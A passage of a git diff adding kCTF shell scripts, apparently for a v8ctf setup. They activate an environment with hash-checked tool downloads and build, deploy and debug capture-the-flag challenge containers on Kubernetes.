[[ "$OSTYPE" =~ ^darwin.* ]]; then + KCTF_YQ_URL="https://github.com/mikefarah/yq/releases/download/v4.2.0/yq_darwin_amd64" + KCTF_YQ_HASH="83b9dc96e75799e162035b2ee2dffc0c51de869c27a2e294eb0aee8653a19804" + + KCTF_KIND_URL="https://kind.sigs.k8s.io/dl/v0.11.1/kind-darwin-amd64" + KCTF_KIND_HASH="432bef555a70e9360b44661c759658265b9eaaf7f75f1beec4c4d1e6bbf97ce3" + + KCTF_KUBECTL_URL="https://dl.k8s.io/release/v1.20.4/bin/darwin/amd64/kubectl" + KCTF_KUBECTL_HASH="37f593731b8c9913bf2a3bfa36dacb3058dc176c7aeae2930c783822ea03a573" + + STAT="gstat" + MKTEMP="gmktemp" + + script_dir="$(dirname "${BASH_SOURCE-$0}")" + if [[ "$script_dir" == "." ]]; then + script_dir="../." + fi + export KCTF_CTF_DIR="$(realpath "$(dirname "${script_dir}")")" + unset script_dir +else + KCTF_YQ_URL="https://github.com/mikefarah/yq/releases/download/v4.2.0/yq_linux_amd64" + KCTF_YQ_HASH="5d44bd64e264e9029c5f06bcd960ba162d7ed7ddd1781f02a28d62f50577b632" + + KCTF_KIND_URL="https://kind.sigs.k8s.io/dl/v0.11.1/kind-linux-amd64" + KCTF_KIND_HASH="949f81b3c30ca03a3d4effdecda04f100fa3edc07a28b19400f72ede7c5f0491" + + KCTF_KUBECTL_URL="https://dl.k8s.io/release/v1.20.4/bin/linux/amd64/kubectl" + KCTF_KUBECTL_HASH="98e8aea149b00f653beeb53d4bd27edda9e73b48fed156c4a0aa1dabe4b1794c" + + STAT="stat" + MKTEMP="mktemp" + export KCTF_CTF_DIR="$(realpath --no-symlinks "$(dirname "${BASH_SOURCE-$0}")/..")" +fi + +export KCTF_BIN="${KCTF_CTF_DIR}/kctf/bin" +source "${KCTF_BIN}/kctf-log" + +function _kctf_check_umask { + if [[ $((8#$(umask) & 8#755)) -ne 0 ]]; then + _kctf_log_err "umask is too prohibitive. Please set it to 022 when using kctf" + return 1 + fi + if [[ "$(${STAT} "${KCTF_BIN}/kctf-cluster" --format '%a')" -ne "755" ]]; then + _kctf_log_err "${KCTF_BIN}/kctf-cluster has unexpected permissions. Maybe a umask problem during checkout?" + return 1 + fi +} + +function _kctf_setup_environment { + KCTF_CONFIG_DIR="$(${MKTEMP} -d --tmpdir kctf.XXXXXXXXXX)" + if [[ $? 
-ne 0 ]]; then + return 1 + fi + export KCTF_CTF_NAME=$(basename "${KCTF_CTF_DIR}") + export KCTF_SESSION="$(dd if=/dev/urandom bs=1 count=10 2>/dev/null | xxd -ps -c 10)" + + export KUBECONFIG="${KCTF_CONFIG_DIR}/kube.conf" +} + +function _kctf_download_dependencies { + if [[ ! -x "${KCTF_BIN}/yq" ]]; then + if [[ -e "${KCTF_BIN}/yq" ]]; then + rm "${KCTF_BIN}/yq" >/dev/null + fi + wget "${KCTF_YQ_URL}" -O "${KCTF_BIN}/yq" --quiet || return 1 + sha256sum --status -c <(echo "${KCTF_YQ_HASH} ${KCTF_BIN}/yq") || return 1 + chmod u+x "${KCTF_BIN}/yq" + fi + + if [[ ! -x "${KCTF_BIN}/kind" ]] || ! sha256sum --status -c <(echo "${KCTF_KIND_HASH} ${KCTF_BIN}/kind"); then + rm "${KCTF_BIN}/kind" >/dev/null 2>/dev/null || true + curl -Lo "${KCTF_BIN}/kind" "${KCTF_KIND_URL}" || return 1 + sha256sum --status -c <(echo "${KCTF_KIND_HASH} ${KCTF_BIN}/kind") || return 1 + chmod u+x "${KCTF_BIN}/kind" + fi + alias "kind=${KCTF_BIN}/kind" + + if [[ ! -x "${KCTF_BIN}/kubectl" ]]; then + curl -Lo "${KCTF_BIN}/kubectl" "${KCTF_KUBECTL_URL}" || return 1 + sha256sum --status -c <(echo "${KCTF_KUBECTL_HASH} ${KCTF_BIN}/kubectl") || return 1 + chmod u+x "${KCTF_BIN}/kubectl" + fi + alias "kubectl=${KCTF_BIN}/kubectl" +} + +function _kctf_cleanup { + if command -v gcloud >/dev/null 2>&1; then + unset CLOUDSDK_ACTIVE_CONFIG_NAME + # regenerate this name in case the user changed the variable + GCLOUD_CONFIG_NAME="kctf-${KCTF_SESSION}" + if gcloud config configurations describe "${GCLOUD_CONFIG_NAME}" >/dev/null 2>&1; then + echo "Deleting gcloud config ${GCLOUD_CONFIG_NAME}" + CLOUDSDK_CORE_DISABLE_PROMPTS=1 gcloud config configurations delete "${GCLOUD_CONFIG_NAME}" + fi + fi + # regenerate this name in case the user changed the variable + KUBE_CONFIG_NAME="${KCTF_CONFIG_DIR}/kube-${KCTF_SESSION}.conf" + if [[ -e "${KUBE_CONFIG_NAME}" ]]; then + rm "${KUBE_CONFIG_NAME}" >/dev/null + fi +} + +function _kctf_usage { + echo -e "usage: kctf command subcommand [args]" >&2 + echo -e "available commands:" >&2 + echo -e " chal: commands for challenges (creating, deploying, etc.)" >&2 + echo -e " cluster: commands for clusters (creating, managing, etc.) " >&2 +} + +# Implemented as a function so that we can set environment variables where needed +function kctf { + if [[ $# -lt 1 ]]; then + _kctf_log_err "missing required argument" + _kctf_usage + return 1 + fi + case "$1" in + -h|--help) + _kctf_usage + return 0 + ;; + chal) + _kctf_set_active_challenge + shift + "${KCTF_CTF_DIR}/kctf/bin/kctf-challenge" $@ + ret=$? + if [[ $ret -ne 0 ]]; then + _kctf_log_err "command returned $ret" + fi + return $ret + ;; + cluster) + shift + if [[ "$1" == "create" ]] || [[ "$1" == "load" ]]; then + CONFIG_NAME=$("${KCTF_CTF_DIR}/kctf/bin/kctf-cluster" $@) + if [[ $? -ne 0 ]]; then + return 1 + fi + if [[ -z "${CONFIG_NAME}" ]]; then + return 0 + fi + source "${KCTF_CTF_DIR}/kctf/config/${CONFIG_NAME}" + export CLUSTER_TYPE + export PROJECT + export ZONE + export REGISTRY + export CLUSTER_NAME + export DOMAIN_NAME + export EMAIL_ADDRESS + if [[ "${CLUSTER_TYPE}" == "gce" ]]; then + export CLOUDSDK_ACTIVE_CONFIG_NAME="kctf-${KCTF_SESSION}" + fi + KCTF_CONFIG="${CONFIG_NAME}" + else + "${KCTF_CTF_DIR}/kctf/bin/kctf-cluster" $@ + fi + ret=$? 
+ if [[ $ret -ne 0 ]]; then + _kctf_log_err "command returned $ret" + fi + return $ret + ;; + *) + _kctf_usage + return 1 + ;; + esac +} + +function _kctf_enable_completion { + source "${KCTF_BIN}/kctf-completion" +} + +function _kctf_error_cleanup { + unset -f _kctf_download_dependencies + # don't unset _kctf_cleanup since it's used in a trap below + #unset -f _kctf_cleanup + unset -f _kctf_usage + unset -f _kctf_error_cleanup + unset -f _kctf_enable_completion + unset -f _kctf_set_active_challenge + unset -f _kctf_setup_environment + unset -f _kctf_check_umask + unset -f _kctf_activate + unset -f _kctf_chal_string + unset -f _kctf_log + unset -f _kctf_log_err + unset -f kctf + unset -f deactivate + + unset KCTF_CONFIG + unset KCTF_CONFIG_DIR + unset KCTF_CTF_DIR + unset KCTF_CTF_NAME + unset KCTF_BIN + unset KCTF_SESSION + unset KCTF_YQ_URL + unset KCTF_YQ_HASH + unset KUBECONFIG + unset CHALLENGE_NAMESPACE + unset CHALLENGE_NAME + unset CHALLENGE_DIR + + unset _KCTF_PROMPT_COLOR1 + unset _KCTF_PROMPT_COLOR2 + unset _KCTF_PROMPT_COLOR_END + + unset CLUSTER_TYPE + unset PROJECT + unset ZONE + unset REGISTRY + unset CLUSTER_NAME + unset DOMAIN_NAME + unset EMAIL_ADDRESS +} + +function _kctf_set_active_challenge { + current_dir="${PWD}" + while [[ "${current_dir}" == "${KCTF_CTF_DIR}"/* ]]; do + if [[ -e "${current_dir}/challenge.yaml" ]]; then + CHALLENGE_NAME=$("${KCTF_BIN}/yq" eval --exit-status 'select(.kind == "Challenge") | .metadata.name' "${current_dir}/challenge.yaml" 2>/dev/null) + if [[ $? -ne 0 ]]; then + unset CHALLENGE_NAME + fi + CHALLENGE_NAMESPACE="default" + if "${KCTF_BIN}/yq" eval --exit-status 'select(.kind == "Challenge") | .metadata.namespace' "${current_dir}/challenge.yaml" >/dev/null 2>/dev/null; then + CHALLENGE_NAMESPACE=$("${KCTF_BIN}/yq" eval 'select(.kind == "Challenge") | .metadata.namespace' "${current_dir}/challenge.yaml" 2>/dev/null) + fi + export CHALLENGE_DIR="${current_dir}" + export CHALLENGE_NAME + export CHALLENGE_NAMESPACE + return 0 + fi + current_dir="$(dirname ${current_dir})" + done + unset CHALLENGE_NAME +} + +if [[ -n "${ZSH_VERSION:-}" ]]; then + _KCTF_PROMPT_COLOR1=$'%F{green}' + _KCTF_PROMPT_COLOR2=$'%F{cyan}' + _KCTF_PROMPT_COLOR_END=$'%f' +else + _KCTF_PROMPT_COLOR1=$'\001\e[0;32m\002' + _KCTF_PROMPT_COLOR2=$'\001\e[0;36m\002' + _KCTF_PROMPT_COLOR_END=$'\001\e[0m\002' +fi + +function _kctf_config_string { + if [ ! -z "${KCTF_CONFIG}" ]; then + echo "${_KCTF_PROMPT_COLOR1},config=${_KCTF_PROMPT_COLOR2}${KCTF_CONFIG}" + fi +} + +function _kctf_chal_string { + _kctf_set_active_challenge + if [ ! -z "${CHALLENGE_NAME}" ]; then + echo "${_KCTF_PROMPT_COLOR1},chal=${_KCTF_PROMPT_COLOR2}${CHALLENGE_NAME}" + fi +} + +function _kctf_activate { + _kctf_check_umask || return 1 + + if ! _kctf_setup_environment; then + _kctf_log_err 'error setting up the environment' + return 1 + fi + if ! _kctf_download_dependencies; then + _kctf_log_err 'error downloading dependencies' + return 1 + fi + _kctf_enable_completion || echo "loading shell completion failed" >&2 + SAVED_PS1="${PS1}" + _kctf_log "kCTF environment activated. Run \"deactivate\" to exit." 
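+  # .lastconfig is a symlink maintained by kctf-cluster that points at the most recently used config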
+ if kctf cluster load .lastconfig >/dev/null 2>/dev/null; then + _kctf_log "automatically loaded last config" + else + _kctf_log "To create a cluster config, run \"kctf cluster create\"" + fi + PS1="${PS1}${_KCTF_PROMPT_COLOR1}kCTF[ctf=${_KCTF_PROMPT_COLOR2}${KCTF_CTF_NAME}\$(_kctf_config_string)\$(_kctf_chal_string)${_KCTF_PROMPT_COLOR1}] >${_KCTF_PROMPT_COLOR_END} " +} + +function deactivate { + _kctf_cleanup + _kctf_error_cleanup + PS1="${SAVED_PS1}" + unset SAVED_PS1 +} + +if _kctf_activate; then + trap _kctf_cleanup EXIT +else + _kctf_error_cleanup +fi diff --git a/v8ctf/kctf/bin/kctf-challenge b/v8ctf/kctf/bin/kctf-challenge new file mode 100755 index 00000000..15f32934 --- /dev/null +++ b/v8ctf/kctf/bin/kctf-challenge @@ -0,0 +1,634 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +source "${KCTF_BIN}/kctf-log" + +if [[ "$OSTYPE" =~ ^darwin.* ]]; then + GETOPT="$(brew --prefix gnu-getopt)/bin/getopt" +else + GETOPT="getopt" +fi + +function has_cluster_config { + [[ ! -z "${CLUSTER_NAME-}" ]] +} + +function require_cluster_config { + if ! has_cluster_config; then + _kctf_log_err "No config loaded. You need to run \"kctf cluster\" first." + exit 1 + fi +} + +function require_active_challenge { + if [[ -z "${CHALLENGE_DIR-}" ]]; then + _kctf_log_err "No active challenge, please cd to a challenge directory first." + exit 1 + fi +} + +function parse_help_arg_only_usage { + echo -e "usage: kctf chal ${COMMAND} [args]" >&2 + echo -e "" >&2 + echo -e "${DESCRIPTION}" >&2 + echo -e "" >&2 + echo -e "Args:" >&2 + echo -e " -h|--help print this help" >&2 +} + +function parse_help_arg_only { + OPTS="h" + LONGOPTS="help" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal ${COMMAND}" -- "$@") + if [[ $? -ne 0 ]]; then + parse_help_arg_only_usage + exit 1 + fi + eval set -- "$PARSED" + + while true; do + case "$1" in + -h|--help) + parse_help_arg_only_usage + exit 0 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + parse_help_arg_only_usage + exit 1 + ;; + esac + done + + require_active_challenge +} + +function parse_container_name_usage { + echo -e "usage: kctf chal ${COMMAND} [args]" >&2 + echo -e " -h|--help print this help" >&2 + echo -e " --container name of the container to interact with, e.g. challenge (default) or healthcheck" >&2 +} + +function parse_container_name { + OPTS="h" + LONGOPTS="help,container:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal ${COMMAND}" -- "$@") + if [[ $? -ne 0 ]]; then + parse_container_name_usage + exit 1 + fi + eval set -- "$PARSED" + + CONTAINER="challenge" + while true; do + case "$1" in + -h|--help) + parse_container_name_usage + exit 0 + ;; + --container) + CONTAINER="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." 
+ parse_container_name_usage + exit 1 + ;; + esac + done + + require_active_challenge +} + +function build_image { + # build the image + CONTAINER_NAME="$1" + CONTAINER_DIR="${CHALLENGE_DIR}/${CONTAINER_NAME}" + _kctf_log "building image in \"${CONTAINER_DIR}\"" + IIDFILE="$(mktemp)" + if find "${CONTAINER_DIR}" -type l -exec false {} + >/dev/null 2>/dev/null; then + docker build "${CONTAINER_DIR}" --iidfile "${IIDFILE}" + else + _kctf_log "found symlink, building with tar -czh | docker" + tar -C "${CONTAINER_DIR}" -czh . | docker build --iidfile "${IIDFILE}" - + fi + if [[ $? -ne 0 ]]; then + rm "${IIDFILE}" + return 1 + fi + IMAGE_ID=$(cat "${IIDFILE}") + rm "${IIDFILE}" + + # strip optional sha256 prefix + if [[ "${IMAGE_ID}" = sha256:* ]]; then + IMAGE_ID=$(echo "${IMAGE_ID}" | cut -d ':' -f 2) + fi + _kctf_log "Image ID \"${IMAGE_ID}\"" +} + +function healthcheck_enabled { + [[ $("${KCTF_BIN}/yq" eval 'select(.kind == "Challenge") | .spec.healthcheck.enabled' "${CHALLENGE_DIR}/challenge.yaml") == "true" ]] +} + +function build_images { + build_image challenge || return + CHALLENGE_IMAGE_LOCAL="${IMAGE_ID}" + if healthcheck_enabled; then + build_image healthcheck || return + HEALTHCHECK_IMAGE_LOCAL="${IMAGE_ID}" + fi +} + +function push_image { + IMAGE_NAME=$1 + IMAGE_ID=$2 + + case "${CLUSTER_TYPE}" in + gce) + IMAGE_URL="${REGISTRY}/${PROJECT}/${CHALLENGE_NAME}-${IMAGE_NAME}:${IMAGE_ID}" + docker tag "${IMAGE_ID}" "${IMAGE_URL}" || return + docker push "${IMAGE_URL}" || return + ;; + kind) + IMAGE_URL="kind/${IMAGE_NAME}:${IMAGE_ID}" + docker tag "${IMAGE_ID}" "${IMAGE_URL}" || return + "${KCTF_BIN}/kind" load docker-image --name "${CLUSTER_NAME}" "${IMAGE_URL}" || return + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac + _kctf_log "Image pushed to \"${IMAGE_URL}\"" +} + +function push_images { + push_image "challenge" "${CHALLENGE_IMAGE_LOCAL}" || return + CHALLENGE_IMAGE_REMOTE="${IMAGE_URL}" + if healthcheck_enabled; then + push_image "healthcheck" "${HEALTHCHECK_IMAGE_LOCAL}" || return + HEALTHCHECK_IMAGE_REMOTE="${IMAGE_URL}" + fi +} + +function kctf_chal_start { + require_cluster_config + COMMAND="start" DESCRIPTION="Deploy the challenge to the cluster." parse_help_arg_only $@ || return + build_images || return + push_images || return + + # update challenge.yaml with the image urls + "${KCTF_BIN}/yq" eval "select(.kind == \"Challenge\") | .spec.image = \"${CHALLENGE_IMAGE_REMOTE}\", select(.kind == \"Challenge\" | not)" --inplace "${CHALLENGE_DIR}/challenge.yaml" + if healthcheck_enabled; then + "${KCTF_BIN}/yq" eval "select(.kind == \"Challenge\") | .spec.healthcheck.image = \"${HEALTHCHECK_IMAGE_REMOTE}\", select(.kind == \"Challenge\" | not)" --inplace "${CHALLENGE_DIR}/challenge.yaml" + fi + + "${KCTF_BIN}/kubectl" apply -f "${CHALLENGE_DIR}/challenge.yaml" || return +} + +function kctf_chal_stop { + require_cluster_config + COMMAND="stop" DESCRIPTION="Stop a challenge running on the cluster." parse_help_arg_only $@ || return + "${KCTF_BIN}/kubectl" delete -f "${CHALLENGE_DIR}/challenge.yaml" || return +} + +function kctf_chal_status { + require_cluster_config + COMMAND="status" DESCRIPTION="Print the challenge status." 
parse_help_arg_only $@ || return + + echo "= CHALLENGE RESOURCE =" + echo + "${KCTF_BIN}/kubectl" get "challenge/${CHALLENGE_NAME}" --namespace "${CHALLENGE_NAMESPACE}" + echo + echo "= INSTANCES / PODs =" + echo + echo "Challenge execution status" + echo "This shows you how many instances of the challenges are running." + echo + "${KCTF_BIN}/kubectl" get pods -l "app=${CHALLENGE_NAME}" -o wide --namespace "${CHALLENGE_NAMESPACE}" + echo + echo + echo "= DEPLOYMENTS =" + echo + echo "Challenge deployment status" + echo "This shows you if the challenge was deployed to the cluster." + echo + "${KCTF_BIN}/kubectl" get deployments -l "app=${CHALLENGE_NAME}" -o wide --namespace "${CHALLENGE_NAMESPACE}" + echo + echo "= EXTERNAL SERVICES =" + echo + echo "Challenge external status" + echo "This shows you if the challenge is exposed externally." + echo + echo "SERVICES:" + "${KCTF_BIN}/kubectl" get services -l "app=${CHALLENGE_NAME}" -o custom-columns="NAME:.metadata.name,TYPE:.spec.type,EXTERNAL-IP:.status.loadBalancer.ingress[*]['ip'],PORT:.spec.ports[*].port,DNS:.metadata.annotations['external-dns\\.alpha\\.kubernetes\\.io/hostname']" --namespace "${CHALLENGE_NAMESPACE}" + echo + echo "Ingresses:" + "${KCTF_BIN}/kubectl" get ingress -l "app=${CHALLENGE_NAME}" -o wide --namespace "${CHALLENGE_NAMESPACE}" +} + +function kctf_chal_debug_logs_usage { + echo -e "usage: kctf chal debug logs [args]" >&2 + echo -e " -h|--help print this help" >&2 + echo -e " --container name of the container to interact with, e.g. challenge (default) or healthcheck" >&2 + echo -e " --tail how many lines to print per pod (default 20)" >&2 +} + +function kctf_chal_debug_logs { + require_cluster_config + + OPTS="h" + LONGOPTS="help,container:,tail:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal ${COMMAND}" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_chal_debug_logs_usage + exit 1 + fi + eval set -- "$PARSED" + + CONTAINER="challenge" + TAIL="20" + while true; do + case "$1" in + -h|--help) + kctf_chal_debug_logs_usage + exit 0 + ;; + --container) + CONTAINER="$2" + shift 2 + ;; + --tail) + TAIL="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + kctf_chal_debug_logs_usage + exit 1 + ;; + esac + done + + require_active_challenge + + pods=($("${KCTF_BIN}/kubectl" get pods -l "app=${CHALLENGE_NAME}" -o jsonpath='{.items[*].metadata.name}')) + + if [[ ${#pods[@]} -eq 0 ]]; then + _kctf_log_err 'No pods found. Is the challenge running?' + return 1 + fi + + for pod in "${pods[@]}"; do + startTime=$("${KCTF_BIN}/kubectl" get "pods/${pod}" -o jsonpath='{.status.startTime}') + _kctf_log "== ${pod} (started @ ${startTime}) ==" + "${KCTF_BIN}/kubectl" logs "pods/${pod}" --tail="${TAIL}" -c "${CONTAINER}" --namespace "${CHALLENGE_NAMESPACE}" + done +} + +function kctf_chal_debug_ssh { + require_cluster_config + COMMAND="debug ssh" parse_container_name $@ || return + + pods=($("${KCTF_BIN}/kubectl" get pods -l "app=${CHALLENGE_NAME}" -o jsonpath='{.items[*].metadata.name}')) + + if [[ ${#pods[@]} -eq 0 ]]; then + _kctf_log_err 'No pods found. Is the challenge running?' + return 1 + fi + + pod="${pods[0]}" + if [[ ${#pods[@]} -ne 1 ]]; then + _kctf_log "Found ${#pods[@]} pods, connecting to the most recent one." 
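+    # the loop below picks the most recently started pod whose target container is still running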
+ _kctf_log "You can list the other pods with 'kubectl get pods'" + _kctf_log "and connect to them using 'kubectl exec pod/PODNAME --namespace ${CHALLENGE_NAMESPACE} -c ${CONTAINER} -it -- /bin/bash'" + + latestStartTime=$(date -d "$("${KCTF_BIN}/kubectl" get "pods/${pod}" -o jsonpath='{.status.startTime}')" '+%s') + for (( i=1; i < ${#pods[@]}; i++ )); do + otherPod="${pods[$i]}" + otherStartTime=$(date -d "$("${KCTF_BIN}/kubectl" get "pods/${otherPod}" -o jsonpath='{.status.startTime}')" '+%s') + if [[ -z "$("${KCTF_BIN}/kubectl" get "pod/${otherPod}" -o jsonpath="{.status.containerStatuses[?(@.name==\"${CONTAINER}\")].state.running}")" ]]; then + _kctf_log_warn "skipping pod/${otherPod} since the container \"${CONTAINER}\" is not running" + continue + fi + if [[ "${otherStartTime}" -gt "${latestStartTime}" ]]; then + latestStartTime="${otherStartTime}" + pod="${otherPod}" + fi + done + fi + + _kctf_log "Connecting to pod ${pod}" + "${KCTF_BIN}/kubectl" exec "pod/${pod}" --namespace "${CHALLENGE_NAMESPACE}" -c "${CONTAINER}" -it -- /bin/bash +} + +function kctf_chal_debug_port_forward_usage { + echo -e "usage: kctf chal debug port-forward [args]" >&2 + echo -e "args:" >&2 + echo -e " -h|--help print this help" >&2 + echo -e " --port: port in the challenge to connect to (default 1337)" >&2 + echo -e " --local-port: local port to listen on (defaults to random free port)" >&2 +} + +function kctf_chal_debug_port_forward { + REMOTE_PORT=1337 + LOCAL_PORT="" + + OPTS="h" + LONGOPTS="help,challenge-name:,port:,local-port:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal debug port-forward" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_chal_debug_port_forward_usage + exit 1 + fi + eval set -- "$PARSED" + + while true; do + case "$1" in + -h|--help) + kctf_chal_debug_port_forward_usage + exit 0 + ;; + --port) + REMOTE_PORT="$2" + shift 2 + ;; + --local-port) + LOCAL_PORT="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." 
+ kctf_chal_debug_port_forward_usage + exit 1 + ;; + esac + done + + require_active_challenge + + _kctf_log 'starting port-forward, ctrl+c to exit' + "${KCTF_BIN}/kubectl" port-forward "deployment/${CHALLENGE_NAME}" --namespace "${CHALLENGE_NAMESPACE}" --address=127.0.0.1 "${LOCAL_PORT}:${REMOTE_PORT}" +} + +function kctf_chal_debug_docker { + COMMAND="debug docker" parse_container_name $@ || return + + build_image "${CONTAINER}" || return + + DOCKER_NAME="kctf-${KCTF_CTF_NAME}-${CHALLENGE_NAME}-${CONTAINER}" + + # kill any existing containers + docker kill "${DOCKER_NAME}" >/dev/null 2>/dev/null + docker container rm "${DOCKER_NAME}" >/dev/null 2>/dev/null + + _kctf_log "Running docker container ${IMAGE_ID} using name ${DOCKER_NAME}" + docker run -d --name "${DOCKER_NAME}" -it -p 1337 --privileged "${IMAGE_ID}" || return 1 + docker ps -f "name=${DOCKER_NAME}" || return 1 + _kctf_log "Container running, ctrl+c to exit" + docker attach "${DOCKER_NAME}" +} + + +function kctf_chal_debug_usage { + echo -e "usage: kctf chal debug command" >&2 + echo -e "available commands:" >&2 + echo -e " logs: print logs of the container" >&2 + echo -e " ssh: spawn an interactive bash in the container" >&2 + echo -e " port-forward: create a port-forward to the container's default port" >&2 + echo -e " docker: run the docker container locally" >&2 + echo -e "NOTE: you can use --container=healthcheck flag to debug the healthcheck" >&2 +} + +function kctf_chal_debug { + if [[ $# -lt 1 ]]; then + _kctf_log_err "unexpected argument count" + kctf_chal_debug_usage + exit 1 + fi + + case "$1" in + -h|--help) + kctf_chal_debug_usage + exit 0 + ;; + logs) + shift + kctf_chal_debug_logs $@ + ;; + ssh) + shift + kctf_chal_debug_ssh $@ + ;; + port-forward) + shift + kctf_chal_debug_port_forward $@ + ;; + docker) + shift + kctf_chal_debug_docker $@ + ;; + *) + _kctf_log_err "unknown command" + kctf_chal_debug_usage + exit 1 + ;; + esac +} + +function kctf_chal_create_usage { + echo "usage: kctf chal create [args] name" >&2 + echo "args:" >&2 + echo " -h|--help print this help" >&2 + echo " --template which template to use (run --template list to print available templates)" >&2 + echo " --challenge-dir path where to create the new challenge" >&2 + echo " default: \"${KCTF_CTF_DIR}/\${CHALLENGE_NAME}\"" >&2 +} + +function kctf_chal_create { + OPTS="h" + LONGOPTS="help,template:,challenge-dir:" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf chal create" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_chal_create_usage + exit 1 + fi + eval set -- "$PARSED" + + CHALLENGE_DIR= + TEMPLATE=pwn + while true; do + case "$1" in + -h|--help) + kctf_chal_create_usage + exit 0 + ;; + --template) + TEMPLATE="$2" + shift 2 + ;; + --challenge-dir) + CHALLENGE_DIR="$2" + shift 2 + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." + parse_help_arg_only_usage + exit 1 + ;; + esac + done + + if [[ "${TEMPLATE}" == "list" ]]; then + echo "available templates:" + for template in ${KCTF_CTF_DIR}/kctf/challenge-templates/*; do + echo " $(basename ${template})" + done + exit 0 + fi + + if [[ $# -ne 1 ]]; then + _kctf_log_err "kctf chal create: name missing" + kctf_chal_create_usage + exit 1 + fi + + TEMPLATE_DIR="${KCTF_CTF_DIR}/kctf/challenge-templates/${TEMPLATE}" + if [[ ! 
-e "${TEMPLATE_DIR}/challenge.yaml" ]]; then + _kctf_log_err "kctf chal create: template \"${TEMPLATE}\" not found" + _kctf_log_err " run \"kctf chal create --template list\" to list available templates" + exit 1 + fi + + CHALLENGE_NAME="$1" + shift + + if [[ -z "${CHALLENGE_DIR}" ]]; then + CHALLENGE_DIR="${KCTF_CTF_DIR}/${CHALLENGE_NAME}" + else + CHALLENGE_DIR_REALPATH=$(realpath --canonicalize-missing "${CHALLENGE_DIR}") + if [[ "${CHALLENGE_DIR_REALPATH}" != "${KCTF_CTF_DIR}"/* ]]; then + _kctf_log_err "Challenge dir needs to be under the CTF dir:" + _kctf_log_err " \"${CHALLENGE_DIR_REALPATH}\"" + _kctf_log_err " not under" + _kctf_log_err " \"${KCTF_CTF_DIR}\"" + exit 1 + fi + fi + if [[ -e "${CHALLENGE_DIR}" ]]; then + _kctf_log_err "error: challenge dir \"${CHALLENGE_DIR}\" does already exist" + exit 1 + fi + + mkdir -p $(dirname "${CHALLENGE_DIR}") >/dev/null 2>/dev/null + + umask a+rx + cp -p -r "${TEMPLATE_DIR}" "${CHALLENGE_DIR}" + ${KCTF_BIN}/yq eval ".metadata.name = \"${CHALLENGE_NAME}\"" --inplace "${CHALLENGE_DIR}/challenge.yaml" +} + +function kctf_chal_list { + echo '== challenges in repository ==' + + for challenge_yaml in $(find "${KCTF_CTF_DIR}" -path "${KCTF_CTF_DIR}/kctf" -prune -false -o -name "challenge.yaml"); do + challenge_name=$(${KCTF_BIN}/yq eval "select(.kind == \"Challenge\") | .metadata.name" "${challenge_yaml}") + challenge_dir=$(realpath --relative-to "${KCTF_CTF_DIR}" $(dirname "${challenge_yaml}")) + if [[ "${challenge_name}" == ${challenge_dir} ]]; then + echo "${challenge_name}" + else + echo "${challenge_name} (dir: ${challenge_dir})" + fi + done + + if has_cluster_config; then + echo '== deployed challenges ==' + "${KCTF_BIN}/kubectl" get challenges + fi +} + +function kctf_chal_usage { + echo -e "usage: kctf chal command" >&2 + echo -e "available commands:" >&2 + echo -e " create: create a new challenge from a template" >&2 + echo -e " list: list existing challenges" >&2 + echo -e " start: deploy the challenge to the cluster" >&2 + echo -e " stop: delete the challenge from the cluster" >&2 + echo -e " status: print the current status of the challenge" >&2 + echo -e " debug: commands for debugging the challenge" >&2 +} + +if [[ $# -lt 1 ]]; then + _kctf_log_err "unexpected argument count" + kctf_chal_usage + exit 1 +fi + +case "$1" in + -h|--help) + kctf_chal_usage + exit 0 + ;; + create) + shift + kctf_chal_create $@ + ;; + list) + shift + kctf_chal_list $@ + ;; + start) + shift + kctf_chal_start $@ + ;; + stop) + shift + kctf_chal_stop $@ + ;; + status) + shift + kctf_chal_status $@ + ;; + debug) + shift + kctf_chal_debug $@ + ;; + *) + _kctf_log_err "unknown command" + kctf_chal_usage + exit 1 + ;; +esac + diff --git a/v8ctf/kctf/bin/kctf-cluster b/v8ctf/kctf/bin/kctf-cluster new file mode 100755 index 00000000..823b57f0 --- /dev/null +++ b/v8ctf/kctf/bin/kctf-cluster @@ -0,0 +1,1004 @@ +#!/bin/bash +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
